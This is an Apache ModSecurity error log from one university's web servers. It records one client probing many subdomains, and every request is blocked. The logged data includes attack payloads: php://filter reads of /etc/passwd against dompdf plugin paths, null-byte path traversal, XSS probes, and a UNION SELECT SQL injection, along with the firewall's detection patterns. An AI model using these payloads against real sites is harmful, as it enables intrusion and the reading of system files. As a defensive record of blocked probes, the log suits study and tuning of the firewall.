[Tue Aug 29 11:53:29.594949 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAowNpwAAAAH"]
[Tue Aug 29 11:53:29.972184 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAoz72MAAAAS"]
[Tue Aug 29 11:53:30.171793 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ysCo-f0AAAoyGzoAAAAI"]
[Tue Aug 29 11:53:30.228349 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15ysCo-f0AAAot8QUAAAAn"]
[Tue Aug 29 11:53:30.539244 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAowNp8AAAAH"]
[Tue Aug 29 11:53:30.552552 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAn406YAAAAW"]
[Tue Aug 29 11:53:30.554551 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAo2m3sAAAAA"]
[Tue Aug 29 11:53:30.557970 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/module/"] [unique_id "ZO15ysCo-f0AAAoLfUIAAAAG"]
[Tue Aug 29 11:53:30.600625 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoz72YAAAAS"]
[Tue Aug 29 11:53:30.603143 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ysCo-f0AAAo0gOkAAAAZ"]
[Tue Aug 29 11:53:30.604467 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoXJyEAAAAP"]
[Tue Aug 29 11:53:30.646977 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15ysCo-f0AAAo2m30AAAAA"]
[Tue Aug 29 11:53:31.019191 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoT7Y8AAAAD"]
[Tue Aug 29 11:53:31.025268 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAnHQr4AAAAT"]
[Tue Aug 29 11:53:31.076488 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15y8Co-f0AAAoLfUYAAAAG"]
[Tue Aug 29 11:53:31.237155 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoXJyQAAAAP"]
[Tue Aug 29 11:53:31.239053 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoz72kAAAAS"]
[Tue Aug 29 11:53:31.243141 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAolKXoAAAAe"]
[Tue Aug 29 11:53:31.243434 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoLfUcAAAAG"]
[Tue Aug 29 11:53:31.699645 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15y8Co-f0AAAofm8oAAAAX"]
[Tue Aug 29 11:53:31.705350 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoPucEAAAAM"]
[Tue Aug 29 11:53:32.560456 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15zMCo-f0AAAoLfUsAAAAG"]
[Tue Aug 29 11:53:33.566353 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15zcCo-f0AAAoesPgAAAAV"]
[Tue Aug 29 11:53:33.583577 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAo2m4cAAAAA"]
[Tue Aug 29 11:53:33.647490 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAo3IewAAAAa"]
[Tue Aug 29 11:53:33.677922 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAoLfU4AAAAG"]
[Tue Aug 29 11:53:33.889318 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAoesPkAAAAV"]
[Tue Aug 29 11:53:33.890760 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAoW7RkAAAAJ"]
[Tue Aug 29 11:53:33.999357 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAo2m4kAAAAA"]
[Tue Aug 29 11:53:34.121416 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zsCo-f0AAAoUJcAAAAAB"]
[Tue Aug 29 11:53:34.142069 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAoW7RsAAAAJ"]
